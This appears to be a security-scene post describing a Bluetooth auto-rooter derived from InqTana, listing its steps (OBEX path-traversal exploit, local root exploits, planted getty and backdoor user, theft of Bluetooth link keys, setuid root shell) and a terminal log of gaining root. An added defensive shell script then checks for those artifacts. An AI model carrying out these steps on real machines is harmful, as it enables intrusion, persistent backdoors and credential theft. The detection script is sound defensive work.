This is an improved version of the InqTana code. Rather than a Mac-based worm it is now a Linux-based auto-rooter. What exactly does it do, you ask?

1. Exploit the ../ bug in OBEX (silently! no user interaction, get it? N-O U-S-E-R I-N-T-E-R-A-C-T-I-O-N for you tards out there)
2. Make use of a local exploit to take root. In this case either the excploit.c kernel mach port abuse, CF_CHARSET or launchd exploits.
3. Install a getty on the PDA-Sync port by dropping an /etc/ttys file.
4. Add a local user so the attacker can use his Bluetooth tty prompt to get a local shell.
5. Harvest link keys from the blued.plist file. *grin*
6. Create a setuid root shell in ~/bluetooth for the local user.
7. Clean up.
8. Reboot if it's a 10.3.9 box.

This is the end result (aka pwnage):

kfinisterre@threat:~$ rfcomm connect 0 00:14:51:5A:3D:99 3
Connected /dev/rfcomm0 to 00:14:51:5A:3D:99 on channel 3
Press CTRL-C for hangup
kfinisterre@threat:~$ minicom

Welcome to minicom 2.1

OPTIONS: History Buffer, F-key Macros, Search History Buffer, I18n
Compiled on Nov 5 2005, 15:45:44.

Press CTRL-A Z for help on special keys

k-fs-Computer.local!login: pwned mghee
Password:
Last login: Tue Aug 15 00:45:09 on tty.Blue
Welcome to Darwin!
k-fs-Computer:~ bluetooth$ ls -al
total 48
drwxr-xr-x   4 bluetoot  666    136 15 Aug 00:45 .
drwxrwxr-t   8 root      admin  272 15 Aug 00:26 ..
-rw-------   1 bluetoot  666      5 15 Aug 00:45 .bash_history
-rwsr-xr-x   1 root      666  17000 15 Aug 00:42 shX
k-fs-Computer:~ bluetooth$ ./shX
csh: No entry for terminal type "unknown"
csh: using dumb terminal settings.
[k-fs-Computer:~] bluetoot# id
uid=0(root) gid=0(wheel) groups=0(wheel)

If you need to see more, hopefully you catch Thierry Zoller's hack.lu talk. This code will also be demonstrated in detail in the new book Hacking Exposed Wireless: http://books.mcgraw-hill.com/getbook.php?isbn=0072262583
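As an added defender-side check (not part of the original post or of the InqTana code), the script below looks for two of the host artifacts the steps above leave behind: a getty enabled on a non-console tty in /etc/ttys, and a setuid binary sitting inside a user's home directory. The /etc/ttys sample is constructed and follows the BSD layout (name, getty command, terminal type, status, flags); the function and variable names are my own.

```shell
#!/bin/sh
# Added example, not from the original post. Two host checks for
# artifacts the post lists: an enabled getty on a non-console tty in
# /etc/ttys, and a setuid binary sitting in a user's home directory.

# Constructed sample of a BSD-style /etc/ttys; fields are
# name, getty command, terminal type, status (on/off), flags.
SAMPLE_TTYS='# name   getty                                  type    status  comments
console  "/System/Library/CoreServices/loginwindow.console"  vt100  on  secure
ttyp0    none                                      network off secure
tty.Bluetooth-PDA-Sync "/usr/libexec/getty std.9600"  vt100  on  secure'

# Print the name of every tty marked "on" other than the console.
# The getty command may contain spaces, so scan all fields for the
# status word instead of assuming a fixed column.
enabled_nonconsole_ttys() {
    printf '%s\n' "$1" | awk '
        /^#/ || NF < 4 { next }
        $1 == "console" { next }
        { for (i = 2; i <= NF; i++) if ($i == "on") { print $1; break } }'
}

# List regular files under $1 with the setuid bit set, whatever the owner.
setuid_files() {
    find "$1" -type f -perm -4000 2>/dev/null
}

# Stand-alone usage: audit the live /etc/ttys and every home directory.
if [ "${1:-}" = "--live" ]; then
    enabled_nonconsole_ttys "$(cat /etc/ttys)"
    for h in /Users/* /home/*; do [ -d "$h" ] && setuid_files "$h"; done
fi
```

Run with `--live` on a host to audit the real /etc/ttys and home directories; any tty name or setuid path it prints deserves a look.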